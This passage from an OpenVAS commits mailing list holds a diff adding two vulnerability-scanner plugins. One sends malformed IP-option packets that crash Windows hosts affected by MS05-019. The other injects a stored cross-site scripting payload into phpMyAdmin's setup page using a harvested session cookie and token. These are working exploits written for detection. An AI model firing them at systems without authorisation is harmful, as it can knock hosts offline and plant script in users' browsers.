+ update mentioned hotfixes in the advisory from the below link,
+ http://technet.microsoft.com/en-us/security/bulletin/ms05-019
+
+ References:
+ http://secunia.com/advisories/14512
+ http://securitytracker.com/id/1013686
+ http://technet.microsoft.com/en-us/security/bulletin/ms05-019 ";
+
+ script_description(desc);
+ script_summary("Determine Internet Protocol Validation Remote Code Execution Vulnerability");
+ script_category(ACT_KILL_HOST);
+ script_copyright("Copyright (C) 2011 SecPod");
+ script_family("Windows : Microsoft Bulletins");
+ script_require_ports(139, 445);
+ exit(0);
+}
+
+
+include("smb_nt.inc");
+
+if(TARGET_IS_IPV6()){
+ exit(0);
+}
+
+## Get SMB Port
+port = kb_smb_transport();
+if(!port) {
+ port = 445;
+}
+
+## Check Port State
+if(!get_port_state(port)) {
+ exit(0);
+}
+
+## Building Exploit
+dstaddr = get_host_ip();
+srcaddr = this_host();
+sport = rand() % (65536 - 1024) + 1024;
+
+## IP packet with an option size 39
+options = raw_string(0x03, 0x27, crap(data:"G", length:38));
+
+ip = forge_ip_packet( ip_v : 4,
+ ip_hl : 15,
+ ip_tos : 0,
+ ip_len : 20,
+ ip_id : rand(),
+ ip_p : IPPROTO_TCP,
+ ip_ttl : 64,
+ ip_off : 0,
+ ip_src : srcaddr,
+ data : options );
+
+
+tcp = forge_tcp_packet( ip : ip,
+ th_sport : sport,
+ th_dport : port,
+ th_flags : TH_SYN,
+ th_seq : rand(),
+ th_ack : 0,
+ th_x2 : 0,
+ th_off : 5,
+ th_win : 512,
+ th_urp : 0 );
+
+## Sending Exploit
+start_denial();
+for( i = 0; i < 5 ; i ++ ) {
+ result = send_packet(tcp,pcap_active:FALSE);
+}
+alive = end_denial();
+
+## Confirm Host is Still Alive and Responding
+if(! alive) {
+ security_hole(port);
+}
Property changes on: trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Added: trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,172 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_phpmyadmin_setup_interface_xss_vuln.nasl 18295 2011-11-22 17:17:17Z nov $
+#
+# phpMyAdmin Setup Interface Cross Site Scripting Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902585);
+ script_version("$Revision$");
+ script_cve_id("CVE-2011-4064");
+ script_bugtraq_id(50175);
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-22 17:17:17 +0530 (Tue, 22 Nov 2011)");
+ script_name("phpMyAdmin Setup Interface Cross Site Scripting Vulnerability");
+ desc = "
+ Overview: The host is running phpMyAdmin and is prone to cross-site scripting
+ vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to improper validation of user-supplied input
+ via the 'Servers-0-verbose' parameter to setup/index.php, which allows
+ attackers to execute arbitrary HTML and script code in a user's browser
+ session in the context of an affected site.
+
+ Impact:
+ Successful exploitation will allow remote attackers to insert arbitrary HTML
+ and script code, which will be executed in a user's browser session in the
+ context of an affected site.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ phpMyAdmin versions 3.4.x before 3.4.6
+
+ Fix: Upgrade to phpMyAdmin version 3.4.6 or later,
+ For updates refer, http://www.phpmyadmin.net/home_page/downloads.php
+
+ References:
+ http://osvdb.org/show/osvdb/76711
+ http://secunia.com/advisories/46431
+ http://securitytracker.com/id/1026199
+ http://xforce.iss.net/xforce/xfdb/70681
+ http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php
+ http://hauntit.blogspot.com/2011/09/stored-xss-in-phpmyadmin-345-all.html ";
+
+ script_description(desc);
+ script_summary("Check if phpMyAdmin is vulnerable to Cross-Site Scripting");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (C) 2011 SecPod");
+ script_family("Web application abuses");
+ script_dependencies("secpod_phpmyadmin_detect_900129.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(!get_port_state(port)) {
+ exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+ exit(0);
+}
+
+## Get phpMyAdmin Location
+if(!dir = get_dir_from_kb(port:port, app:"phpMyAdmin")){
+ exit(0);
+}
+
+## Send and Receive the response
+url = "/setup/index.php?tab_hash=&check_page_refresh=1&page=servers&mode=" +
+ "add&submit=New+server";
+req = http_get(item:dir+url, port:port);
+res = http_keepalive_send_recv(port:port, data:req);
+
+## Get Session ID
+cookie = eregmatch(pattern:"Set-Cookie: ([^;]*);", string:res);
+if(isnull(cookie[1])) {
+ exit(0);
+}
+cookie = cookie[1];
+
+## Get Token
+token = eregmatch(pattern:'name="token" value="([a-zA-Z0-9]+)"', string:res);
+if(isnull(token[1])) {
+ exit(0);
+}
+token = token[1];
+
+## Construct attack request
+data = string("tab_hash=&check_page_refresh=1&token=", token, "&Servers-0-",
+ "verbose=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E",
+ "&Servers-0-host=localhost&Servers-0-port=&Servers-0-socket=&S",
+ "ervers-0-connect_type=tcp&Servers-0-extension=mysqli&submit_s",
+ "ave=Save&Servers-0-auth_type=cookie&Servers-0-user=root&Serve",
+ "rs-0-password=&Servers-0-auth_swekey_config=&Servers-0-auth_h",
+ "ttp_realm=&Servers-0-SignonSession=&Servers-0-SignonURL=&Serv",
+ "ers-0-LogoutURL=&Servers-0-only_db=&Servers-0-only_db-userpre",
+ "fs-allow=on&Servers-0-hide_db=&Servers-0-hide_db-userprefs-al",
+ "low=on&Servers-0-AllowRoot=on&Servers-0-DisableIS=on&Servers-",
+ "0-AllowDeny-order=&Servers-0-AllowDeny-rules=&Servers-0-ShowD",
+ "atabasesCommand=SHOW+DATABASES&Servers-0-pmadb=&Servers-0-con",
+ "troluser=&Servers-0-controlpass=&Servers-0-verbose_check=on&S",
+ "ervers-0-bookmarktable=&Servers-0-relation=&Servers-0-usercon",
+ "fig=&Servers-0-table_info=&Servers-0-column_info=&Servers-0-h",
+ "istory=&Servers-0-tracking=&Servers-0-table_coords=&Servers-0",
+ "-pdf_pages=&Servers-0-designer_coords=&Servers-0-tracking_def",
+ "ault_statements=CREATE+TABLE%2CALTER+TABLE%2CDROP+TABLE%2CREN",
+ "AME+TABLE%2CCREATE+INDEX%2CDROP+INDEX%2CINSERT%2CUPDATE%2CDEL",
+ "ETE%2CTRUNCATE%2CREPLACE%2CCREATE+VIEW%2CALTER+VIEW%2CDROP+VI",
+ "EW%2CCREATE+DATABASE%2CALTER+DATABASE%2CDROP+DATABASE&Servers",
+ "-0-tracking_add_drop_view=on&Servers-0-tracking_add_drop_tabl",
+ "e=on&Servers-0-tracking_add_drop_database=on");
+
+url = string(dir, '/setup/index.php?tab_hash=&check_page_refresh=1',
+ '&token=', token, '&page=servers&mode=add&submit=New+server');
+
+req = string("POST ", url, " HTTP/1.1\r\n",
+ "Host: ", get_host_name(), "\r\n",
+ "User-Agent: OpenVAS\r\n",
+ "Cookie: ", cookie, "\r\n",
+ "Content-Type: application/x-www-form-urlencoded\r\n",
+ "Content-Length: ", strlen(data), "\r\n\r\n", data);
+
+## Send crafted POST request and receive the response
+res = http_keepalive_send_recv(port:port, data:req);
+
+## Confirm exploit
+if(res =~ "HTTP/1.. 30")
+{
+ ## Send request and receive the response
+ req = http_get(item:string(dir,"/setup/index.php"), port:port);
+ req = string(chomp(req), '\r\nCookie: ', cookie, '\r\n\r\n');
+ res = http_keepalive_send_recv(port:port, data:req);
+
+ ## Confirm exploit worked by checking the response
+ if("Use SSL (<script>alert(document.cookie)</script>)" >< res){
+ security_warning(port);
+ }
+}
Property changes on: trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
More information about the Openvas-commits
mailing list